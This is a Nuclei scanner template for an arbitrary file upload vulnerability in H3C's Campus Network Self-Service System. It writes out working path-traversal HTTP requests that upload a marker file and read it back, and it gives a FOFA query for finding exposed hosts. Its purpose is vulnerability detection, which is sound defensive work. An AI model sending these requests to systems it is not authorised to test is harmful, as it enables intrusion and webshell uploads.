nuclei-templates/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-up...

45 lines
1.8 KiB
YAML
Raw Normal View History

2024-07-08 22:51:11 +00:00
id: h3c-cnsss-arbitrary-file-upload
2024-07-09 10:56:47 +00:00
2024-07-08 22:51:11 +00:00
info:
name: H3C CNSSS - Arbitrary File Upload
author: securityforeveryone
severity: critical
description: |
H3C-Campus Network Self-Service System vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
reference:
- https://github.com/wy876/POC/blob/main/H3C-%E6%A0%A1%E5%9B%AD%E7%BD%91%E8%87%AA%E5%8A%A9%E6%9C%8D%E5%8A%A1%E7%B3%BB%E7%BB%9Fflexfileupload%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: header="/selfservice"
tags: h3c,lfi,instrusive,file-upload
variables:
filename: "{{rand_base(10)}}"
num: "{{rand_int(1000, 9999)}}"
http:
- raw:
- |
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------WebKitFormBoundaryMmx988TUuintqO4Q
-----------------WebKitFormBoundaryMmx988TUuintqO4Q
Content-Disposition: form-data; name="{{filename}}.txt"; filename="{{filename}}.txt"
Content-Type: application/octet-stream
{{md5(num)}}
-----------------WebKitFormBoundaryMmx988TUuintqO4Q--
- |
GET /imc/primepush/%2e%2e/flex/topobg/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_2,"{{md5(num)}}")'
- 'status_code_1 == 200 && status_code_2 == 200'
2024-07-08 22:58:28 +00:00
condition: and
# digest: 4a0a0047304502205836c3d82803a98ff40be994639c0ef0f831eb261dfb10a38f18d5d9d3c23d7c022100a587e41930c55e90af6b816c3a978203b9a4e359d522fb0a9d3897b3a8d3c541:922c64590222798bb761d5b6d8e72950